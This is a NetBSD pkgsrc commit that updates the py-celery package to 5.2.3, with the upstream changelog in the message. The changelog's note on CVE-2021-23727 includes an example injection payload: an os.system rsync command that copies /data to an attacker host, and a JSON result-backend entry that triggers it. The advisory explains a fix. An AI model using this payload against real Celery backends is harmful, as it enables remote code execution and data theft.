From 6e820eb0e3a48b5d8f5550e8e779d08866c774da Mon Sep 17 00:00:00 2001 From: wiz Date: Tue, 15 Feb 2022 16:24:56 +0000 Subject: [PATCH] py-celery: update to 5.2.3. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 5.2.3 ===== - Allow redis >= 4.0.2. - Upgrade minimum required pymongo version to 3.11.1. - tested pypy3.8 beta (#6998). - Split Signature.__or__ into subclasses' __or__ (#7135). - Prevent duplication in event loop on Consumer restart. - Restrict setuptools>=59.1.1,<59.7.0. - Kombu bumped to v5.2.3 - py-amqp bumped to v5.0.9 - Some docs & CI improvements. 5.2.2 ===== - Various documentation fixes. - Fix CVE-2021-23727 (Stored Command Injection security vulnerability). When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: ``os.system("rsync /data attacker@192.168.56.100:~/data")`` by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload ``rsync /data attacker@192.168.56.100:~/data`` as the exception arguments like so: .. code-block:: python { "exc_module": "os", 'exc_type': "system", "exc_message": "rsync /data attacker@192.168.56.100:~/data" } According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading. 5.2.1 ===== - Fix rstrip usage on bytes instance in ProxyLogger. - Pass logfile to ExecStop in celery.service example systemd file. - fix: reduce latency of AsyncResult.get under gevent (#7052) - Limit redis version: <4.0.0. - Bump min kombu version to 5.2.2. - Change pytz>dev to a PEP 440 compliant pytz>0.dev.0. - Remove dependency to case (#7077). - fix: task expiration is timezone aware if needed (#7065). - Initial testing of pypy-3.8 beta to CI. - Docs, CI & tests cleanups. 5.2.0 ===== - Prevent from subscribing to empty channels (#7040) - fix register_task method. - Fire task failure signal on final reject (#6980) - Limit pymongo version: <3.12.1 (#7041) - Bump min kombu version to 5.2.1 5.2.0rc2 ======== - Bump Python 3.10.0 to rc2. - [pre-commit.ci] pre-commit autoupdate (#6972). - autopep8. - Prevent worker to send expired revoked items upon hello command (#6975). - docs: clarify the 'keeping results' section (#6979). - Update deprecated task module removal in 5.0 documentation (#6981). - [pre-commit.ci] pre-commit autoupdate. - try python 3.10 GA. - mention python 3.10 on readme. - Documenting the default consumer_timeout value for rabbitmq >= 3.8.15. - Azure blockblob backend parametrized connection/read timeouts (#6978). - Add as_uri method to azure block blob backend. - Add possibility to override backend implementation with celeryconfig (#6879). - [pre-commit.ci] pre-commit autoupdate. - try to fix deprecation warning. - [pre-commit.ci] pre-commit autoupdate. - not needed anyore. - not needed anyore. - not used anymore. - add github discussions forum 5.2.0rc1 ======== - Kill all workers when main process exits in prefork model (#6942). - test kombu 5.2.0rc1 (#6947). - try moto 2.2.x (#6948). - Prepared Hacker News Post on Release Action. - update setup with python 3.7 as minimum. - update kombu on setupcfg. - Added note about automatic killing all child processes of worker after its termination. - [pre-commit.ci] pre-commit autoupdate. - Move importskip before greenlet import (#6956). - amqp: send expiration field to broker if requested by user (#6957). - Single line drift warning. - canvas: fix kwargs argument to prevent recursion (#6810) (#6959). - Allow to enable Events with app.conf mechanism. - Warn when expiration date is in the past. - Add the Framework :: Celery trove classifier. - Give indication whether the task is replacing another (#6916). - Make setup.py executable. - Bump version: 5.2.0b3 → 5.2.0rc1. 5.2.0b3 ======= - Add args to LOG_RECEIVED (fixes #6885) (#6898). - Terminate job implementation for eventlet concurrency backend (#6917). - Add cleanup implementation to filesystem backend (#6919). - [pre-commit.ci] pre-commit autoupdate (#69). - Add before_start hook (fixes #4110) (#6923). - Restart consumer if connection drops (#6930). - Remove outdated optimization documentation (#6933). - added https verification check functionality in arangodb backend (#6800). - Drop Python 3.6 support. - update supported python versions on readme. - [pre-commit.ci] pre-commit autoupdate (#6935). - Remove appveyor configuration since we migrated to GA. - pyugrade is now set to upgrade code to 3.7. - Drop exclude statement since we no longer test with pypy-3.6. - 3.10 is not GA so it's not supported yet. - Celery 5.1 or earlier support Python 3.6. - Fix linting error. - fix: Pass a Context when chaining fail results (#6899). - Bump version: 5.2.0b2 → 5.2.0b3. 5.2.0b2 ======= - Test windows on py3.10rc1 and pypy3.7 (#6868). - Route chord_unlock task to the same queue as chord body (#6896). - Add message properties to app.tasks.Context (#6818). - handle already converted LogLevel and JSON (#6915). - 5.2 is codenamed dawn-chorus. - Bump version: 5.2.0b1 → 5.2.0b2. 5.2.0b1 ======= - Add Python 3.10 support (#6807). - Fix docstring for Signal.send to match code (#6835). - No blank line in log output (#6838). - Chords get body_type independently to handle cases where body.type does not exist (#6847). - Fix #6844 by allowing safe queries via app.inspect().active() (#6849). - Fix multithreaded backend usage (#6851). - Fix Open Collective donate button (#6848). - Fix setting worker concurrency option after signal (#6853). - Make ResultSet.on_ready promise hold a weakref to self (#6784). - Update configuration.rst. - Discard jobs on flush if synack isn't enabled (#6863). - Bump click version to 8.0 (#6861). - Amend IRC network link to Libera (#6837). - Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872). - Fix inspect --json output to return valid json without --quiet. - Remove celery.task references in modules, docs (#6869). - The Consul backend must correctly associate requests and responses (#6823). --- net/py-celery/Makefile | 32 +++++++++++++------ net/py-celery/distinfo | 10 +++--- .../patches/patch-requirements_default.txt | 21 ++++++++++++ .../patches/patch-requirements_test.txt | 16 ++++++++++ 4 files changed, 65 insertions(+), 14 deletions(-) create mode 100644 net/py-celery/patches/patch-requirements_default.txt create mode 100644 net/py-celery/patches/patch-requirements_test.txt diff --git a/net/py-celery/Makefile b/net/py-celery/Makefile index ea758880873d..a337f1e129e4 100644 --- a/net/py-celery/Makefile +++ b/net/py-celery/Makefile @@ -1,8 +1,7 @@ -# $NetBSD: Makefile,v 1.22 2022/01/05 15:41:16 wiz Exp $ +# $NetBSD: Makefile,v 1.23 2022/02/15 16:24:56 wiz Exp $ -DISTNAME= celery-5.1.2 +DISTNAME= celery-5.2.3 PKGNAME= ${PYPKGPREFIX}-${DISTNAME} -PKGREVISION= 2 CATEGORIES= net python MASTER_SITES= ${MASTER_SITE_PYPI:=c/celery/} @@ -11,16 +10,26 @@ HOMEPAGE= https://docs.celeryproject.org/ COMMENT= Asynchronous task/job queue based on distributed message passing LICENSE= modified-bsd -DEPENDS+= ${PYPKGPREFIX}-billiard>=3.6.3.0:../../parallel/py-billiard -DEPENDS+= ${PYPKGPREFIX}-click>=7.0:../../devel/py-click +DEPENDS+= ${PYPKGPREFIX}-billiard>=3.6.4.0:../../parallel/py-billiard +DEPENDS+= ${PYPKGPREFIX}-click>=8.0.3:../../devel/py-click DEPENDS+= ${PYPKGPREFIX}-click-didyoumean>=0.0.3:../../devel/py-click-didyoumean DEPENDS+= ${PYPKGPREFIX}-click-plugins>=1.1.1:../../devel/py-click-plugins -DEPENDS+= ${PYPKGPREFIX}-click-repl>=0.1.6:../../devel/py-click-repl -DEPENDS+= ${PYPKGPREFIX}-kombu>=5.0.0:../../net/py-kombu -DEPENDS+= ${PYPKGPREFIX}-pytz-[0-9]*:../../time/py-pytz +DEPENDS+= ${PYPKGPREFIX}-click-repl>=0.2.0:../../devel/py-click-repl +DEPENDS+= ${PYPKGPREFIX}-kombu>=5.2.3:../../net/py-kombu +DEPENDS+= ${PYPKGPREFIX}-pytz>=2021.3:../../time/py-pytz +DEPENDS+= ${PYPKGPREFIX}-setuptools>=59.1.1:../../devel/py-setuptools DEPENDS+= ${PYPKGPREFIX}-vine>=5.0.0:../../devel/py-vine -TEST_DEPENDS+= ${PYPKGPREFIX}-case>=1.3.1:../../devel/py-case -TEST_DEPENDS+= ${PYPKGPREFIX}-test>=6.0:../../devel/py-test +TEST_DEPENDS+= ${PYPKGPREFIX}-boto3>=1.9.178:../../net/py-boto3 +TEST_DEPENDS+= ${PYPKGPREFIX}-moto>=2.2.6:../../net/py-moto +TEST_DEPENDS+= ${PYPKGPREFIX}-msgpack-[0-9]*:../../devel/py-msgpack +#TEST_DEPENDS+= ${PYPKGPREFIX}-pre-commit-[0-9]*:../../wip/py-pre-commit +TEST_DEPENDS+= ${PYPKGPREFIX}-test>=6.2:../../devel/py-test +TEST_DEPENDS+= ${PYPKGPREFIX}-test-celery-[0-9]*:../../devel/py-test-celery +TEST_DEPENDS+= ${PYPKGPREFIX}-test-subtests-[0-9]*:../../devel/py-test-subtests +TEST_DEPENDS+= ${PYPKGPREFIX}-test-timeout-[0-9]*:../../devel/py-test-timeout +# unlisted but needed +TEST_DEPENDS+= ${PYPKGPREFIX}-dns-[0-9]*:../../net/py-dns +TEST_DEPENDS+= ${PYPKGPREFIX}-mongo-[0-9]*:../../databases/py-mongo USE_LANGUAGES= # none @@ -32,5 +41,8 @@ post-install: cd ${DESTDIR}${PREFIX}/bin && \ ${MV} celery celery-${PYVERSSUFFIX} || ${TRUE} +# test status as of 5.2.3 with py-pre-commit +# 1 failed, 2444 passed, 49 skipped, 3 xfailed, 30 warnings + .include "../../lang/python/egg.mk" .include "../../mk/bsd.pkg.mk" diff --git a/net/py-celery/distinfo b/net/py-celery/distinfo index 2e8bb79eee95..4ff99eba855b 100644 --- a/net/py-celery/distinfo +++ b/net/py-celery/distinfo @@ -1,5 +1,7 @@ -$NetBSD: distinfo,v 1.15 2021/10/26 11:06:35 nia Exp $ +$NetBSD: distinfo,v 1.16 2022/02/15 16:24:56 wiz Exp $ -BLAKE2s (celery-5.1.2.tar.gz) = 76e9de1de9188c50b411bda429ddc0296220b4d67c74fd12a6b96a2d0b7bfa68 -SHA512 (celery-5.1.2.tar.gz) = c8f8d8dd4cc23a62ed3eea9b5388865993aee940730d4c672ae24c1b017466b0de6f422c7cb3b1bb2a4e33459a0d2447f9a42e59ee949fda56f3032298402a71 -Size (celery-5.1.2.tar.gz) = 1457540 bytes +BLAKE2s (celery-5.2.3.tar.gz) = 7b69810bf388b118033cc909a0d6f79a4c37c0d5493eb70febdcd28bacce6098 +SHA512 (celery-5.2.3.tar.gz) = 9df7535b9a1e0120fe87f11f054c821e5f806b60833bda7dd37b850a3080b88798edfbeec1edcfb58aecc9c34406a32112f3e952e25cee3e5e79ae2f57ce0071 +Size (celery-5.2.3.tar.gz) = 1472455 bytes +SHA1 (patch-requirements_default.txt) = a878a8bbd3ecc6e305cbcb7c8de2777ab0da1697 +SHA1 (patch-requirements_test.txt) = 7ef7e9a6a72fc19b547d073f9d9bf327959412a7 diff --git a/net/py-celery/patches/patch-requirements_default.txt b/net/py-celery/patches/patch-requirements_default.txt new file mode 100644 index 000000000000..8ae963424e91 --- /dev/null +++ b/net/py-celery/patches/patch-requirements_default.txt @@ -0,0 +1,21 @@ +$NetBSD: patch-requirements_default.txt,v 1.1 2022/02/15 16:24:57 wiz Exp $ + +Relax restrictions. + +--- requirements/default.txt.orig 2021-12-29 05:23:30.000000000 +0000 ++++ requirements/default.txt +@@ -1,9 +1,9 @@ + pytz>=2021.3 +-billiard>=3.6.4.0,<4.0 +-kombu>=5.2.3,<6.0 +-vine>=5.0.0,<6.0 +-click>=8.0.3,<9.0 ++billiard>=3.6.4.0 ++kombu>=5.2.3 ++vine>=5.0.0 ++click>=8.0.3 + click-didyoumean>=0.0.3 + click-repl>=0.2.0 + click-plugins>=1.1.1 +-setuptools>=59.1.1,<59.7.0 ++setuptools>=59.1.1 diff --git a/net/py-celery/patches/patch-requirements_test.txt b/net/py-celery/patches/patch-requirements_test.txt new file mode 100644 index 000000000000..2280d599af4d --- /dev/null +++ b/net/py-celery/patches/patch-requirements_test.txt @@ -0,0 +1,16 @@ +$NetBSD: patch-requirements_test.txt,v 1.4 2022/02/15 16:24:57 wiz Exp $ + +Relax restrictions. + +--- requirements/test.txt.orig 2021-11-21 13:37:38.000000000 +0000 ++++ requirements/test.txt +@@ -1,7 +1,7 @@ +-pytest~=6.2 ++pytest + pytest-celery + pytest-subtests +-pytest-timeout~=1.4.2 ++pytest-timeout + boto3>=1.9.178 + moto>=2.2.6 + pre-commit